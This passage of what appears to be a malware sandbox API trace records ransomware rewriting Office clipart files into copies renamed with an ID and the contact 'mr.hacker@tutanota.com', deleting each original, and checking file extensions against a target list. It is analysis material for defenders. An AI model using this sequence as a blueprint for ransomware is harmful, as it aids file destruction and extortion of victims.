nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.584] SetEndOfFile (hFile=0x37c) returned 1 [0273.584] CloseHandle (hObject=0x37c) returned 1 [0273.584] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.584] SetEndOfFile (hFile=0x2bc) returned 1 [0273.586] CloseHandle (hObject=0x2bc) returned 1 [0273.586] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.586] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090777.wmf")) returned 1 [0273.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF") returned 63 [0273.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF") returned 63 [0273.586] lstrlenW (lpString=".doc") returned 4 [0273.586] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.586] lstrlenW (lpString=".docx") returned 5 [0273.586] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0273.586] lstrlenW (lpString=".pdf") returned 4 [0273.586] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.586] lstrlenW (lpString=".xls") returned 4 [0273.586] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.586] lstrlenW (lpString=".xlsx") returned 5 [0273.586] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0273.586] lstrlenW (lpString=".ppt") returned 4 [0273.586] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF") returned 63 [0273.586] lstrlenW (lpString=".zip") returned 4 [0273.586] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.586] lstrlenW (lpString=".rar") returned 4 [0273.586] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.587] lstrlenW (lpString=".bz2") returned 4 [0273.587] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.587] lstrlenW (lpString=".7z") returned 3 [0273.587] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF") returned 63 [0273.587] lstrlenW (lpString=".dbf") returned 4 [0273.587] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF") returned 63 [0273.587] lstrlenW (lpString=".1cd") returned 4 [0273.587] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF") returned 63 [0273.587] lstrlenW (lpString=".jpg") returned 4 [0273.587] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.588] GetFileSizeEx (in: hFile=0x2bc, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=1456) returned 1 [0273.588] CloseHandle (hObject=0x2bc) returned 1 [0273.588] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090779.wmf")) returned 0x20 [0273.588] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090779.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.588] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090779.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0273.588] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.588] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.588] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090779.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0273.588] GetLastError () returned 0x0 [0273.588] ReadFile (in: hFile=0x2bc, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x5b0, lpOverlapped=0x0) returned 1 [0273.837] WriteFile (in: hFile=0x37c, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x5c0, lpOverlapped=0x0) returned 1 [0273.841] ReadFile (in: hFile=0x2bc, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.841] WriteFile (in: hFile=0x37c, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.841] SetEndOfFile (hFile=0x37c) returned 1 [0273.841] CloseHandle (hObject=0x37c) returned 1 [0273.841] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.842] SetEndOfFile (hFile=0x2bc) returned 1 [0273.843] CloseHandle (hObject=0x2bc) returned 1 [0273.843] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.848] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090779.wmf")) returned 1 [0273.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF") returned 63 [0273.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF") returned 63 [0273.855] lstrlenW (lpString=".doc") returned 4 [0273.855] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.855] lstrlenW (lpString=".docx") returned 5 [0273.855] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1 [0273.855] lstrlenW (lpString=".pdf") returned 4 [0273.855] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.855] lstrlenW (lpString=".xls") returned 4 [0273.855] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.855] lstrlenW (lpString=".xlsx") returned 5 [0273.855] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1 [0273.855] lstrlenW (lpString=".ppt") returned 4 [0273.855] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF") returned 63 [0273.856] lstrlenW (lpString=".zip") returned 4 [0273.856] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.856] lstrlenW (lpString=".rar") returned 4 [0273.856] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.856] lstrlenW (lpString=".bz2") returned 4 [0273.856] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.856] lstrlenW (lpString=".7z") returned 3 [0273.856] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF") returned 63 [0273.856] lstrlenW (lpString=".dbf") returned 4 [0273.856] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF") returned 63 [0273.856] lstrlenW (lpString=".1cd") returned 4 [0273.856] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF") returned 63 [0273.856] lstrlenW (lpString=".jpg") returned 4 [0273.856] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.860] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.860] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.860] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099152.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099152.jpg.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0273.860] GetLastError () returned 0x0 [0273.860] ReadFile (in: hFile=0x2ac, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x2dae, lpOverlapped=0x0) returned 1 [0273.862] WriteFile (in: hFile=0x2b0, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x2db0, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x2db0, lpOverlapped=0x0) returned 1 [0273.863] ReadFile (in: hFile=0x2ac, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.863] WriteFile (in: hFile=0x2b0, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.863] SetEndOfFile (hFile=0x2b0) returned 1 [0273.863] CloseHandle (hObject=0x2b0) returned 1 [0273.863] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.863] SetEndOfFile (hFile=0x2ac) returned 1 [0273.865] CloseHandle (hObject=0x2ac) returned 1 [0273.865] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099152.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.865] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099152.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099152.jpg")) returned 1 [0273.865] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099152.JPG") returned 63 [0273.865] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099152.JPG") returned 63 [0273.865] lstrlenW (lpString=".doc") returned 4 [0273.865] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0273.865] lstrlenW (lpString=".docx") returned 5 [0273.865] lstrcmpiW (lpString1=".docx", lpString2="2.JPG") returned -1 [0273.866] lstrlenW (lpString=".pdf") returned 4 [0273.866] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0273.866] lstrlenW (lpString=".xls") returned 4 [0273.866] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0273.866] lstrlenW (lpString=".xlsx") returned 5 [0273.866] lstrcmpiW (lpString1=".xlsx", lpString2="2.JPG") returned -1 [0273.866] lstrlenW (lpString=".ppt") returned 4 [0273.866] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0273.866] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099152.JPG") returned 63 [0273.866] lstrlenW (lpString=".zip") returned 4 [0273.866] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0273.866] lstrlenW (lpString=".rar") returned 4 [0273.866] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0273.866] lstrlenW (lpString=".bz2") returned 4 [0273.866] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0273.866] lstrlenW (lpString=".7z") returned 3 [0273.866] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0273.866] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099152.JPG") returned 63 [0273.866] lstrlenW (lpString=".dbf") returned 4 [0273.866] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0273.866] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099152.JPG") returned 63 [0273.866] lstrlenW (lpString=".1cd") returned 4 [0273.866] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0273.866] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099152.JPG") returned 63 [0273.866] lstrlenW (lpString=".jpg") returned 4 [0273.866] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0273.867] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=13874) returned 1 [0273.867] CloseHandle (hObject=0x37c) returned 1 [0273.868] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099153.wmf")) returned 0x20 [0273.868] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099153.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.868] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099153.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0273.868] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.868] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.868] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099153.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0273.868] GetLastError () returned 0x0 [0273.868] ReadFile (in: hFile=0x37c, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x3632, lpOverlapped=0x0) returned 1 [0273.870] WriteFile (in: hFile=0x2ac, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x3640, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x3640, lpOverlapped=0x0) returned 1 [0273.871] ReadFile (in: hFile=0x37c, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.871] WriteFile (in: hFile=0x2ac, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.871] SetEndOfFile (hFile=0x2ac) returned 1 [0273.871] CloseHandle (hObject=0x2ac) returned 1 [0273.871] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.871] SetEndOfFile (hFile=0x37c) returned 1 [0273.873] CloseHandle (hObject=0x37c) returned 1 [0273.873] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.873] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099153.wmf")) returned 1 [0273.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF") returned 63 [0273.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF") returned 63 [0273.874] lstrlenW (lpString=".doc") returned 4 [0273.874] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.874] lstrlenW (lpString=".docx") returned 5 [0273.874] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1 [0273.874] lstrlenW (lpString=".pdf") returned 4 [0273.874] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.874] lstrlenW (lpString=".xls") returned 4 [0273.874] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.874] lstrlenW (lpString=".xlsx") returned 5 [0273.874] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1 [0273.874] lstrlenW (lpString=".ppt") returned 4 [0273.874] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF") returned 63 [0273.874] lstrlenW (lpString=".zip") returned 4 [0273.874] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.874] lstrlenW (lpString=".rar") returned 4 [0273.874] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.874] lstrlenW (lpString=".bz2") returned 4 [0273.874] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.874] lstrlenW (lpString=".7z") returned 3 [0273.874] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF") returned 63 [0273.874] lstrlenW (lpString=".dbf") returned 4 [0273.874] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF") returned 63 [0273.874] lstrlenW (lpString=".1cd") returned 4 [0273.874] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF") returned 63 [0273.875] lstrlenW (lpString=".jpg") returned 4 [0273.875] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.875] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=6929) returned 1 [0273.876] CloseHandle (hObject=0x37c) returned 1 [0273.876] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099154.jpg")) returned 0x20 [0273.876] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099154.jpg.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.876] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099154.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0273.876] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.876] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.876] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099154.jpg.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0273.876] GetLastError () returned 0x0 [0273.876] ReadFile (in: hFile=0x37c, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x1b11, lpOverlapped=0x0) returned 1 [0273.878] WriteFile (in: hFile=0x2ac, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x1b20, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x1b20, lpOverlapped=0x0) returned 1 [0273.879] ReadFile (in: hFile=0x37c, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.879] WriteFile (in: hFile=0x2ac, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.879] SetEndOfFile (hFile=0x2ac) returned 1 [0273.879] CloseHandle (hObject=0x2ac) returned 1 [0273.879] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.879] SetEndOfFile (hFile=0x37c) returned 1 [0273.882] CloseHandle (hObject=0x37c) returned 1 [0273.882] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.882] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099154.jpg")) returned 1 [0273.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG") returned 63 [0273.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG") returned 63 [0273.882] lstrlenW (lpString=".doc") returned 4 [0273.882] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0273.882] lstrlenW (lpString=".docx") returned 5 [0273.882] lstrcmpiW (lpString1=".docx", lpString2="4.JPG") returned -1 [0273.882] lstrlenW (lpString=".pdf") returned 4 [0273.882] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0273.882] lstrlenW (lpString=".xls") returned 4 [0273.882] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0273.882] lstrlenW (lpString=".xlsx") returned 5 [0273.882] lstrcmpiW (lpString1=".xlsx", lpString2="4.JPG") returned -1 [0273.882] lstrlenW (lpString=".ppt") returned 4 [0273.883] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0273.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG") returned 63 [0273.883] lstrlenW (lpString=".zip") returned 4 [0273.883] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0273.883] lstrlenW (lpString=".rar") returned 4 [0273.883] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0273.883] lstrlenW (lpString=".bz2") returned 4 [0273.883] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0273.883] lstrlenW (lpString=".7z") returned 3 [0273.883] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0273.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG") returned 63 [0273.883] lstrlenW (lpString=".dbf") returned 4 [0273.883] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0273.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG") returned 63 [0273.883] lstrlenW (lpString=".1cd") returned 4 [0273.883] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0273.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG") returned 63 [0273.883] lstrlenW (lpString=".jpg") returned 4 [0273.883] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0273.883] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=8826) returned 1 [0273.883] CloseHandle (hObject=0x37c) returned 1 [0273.884] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099155.jpg")) returned 0x20 [0273.884] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099155.jpg.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.884] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 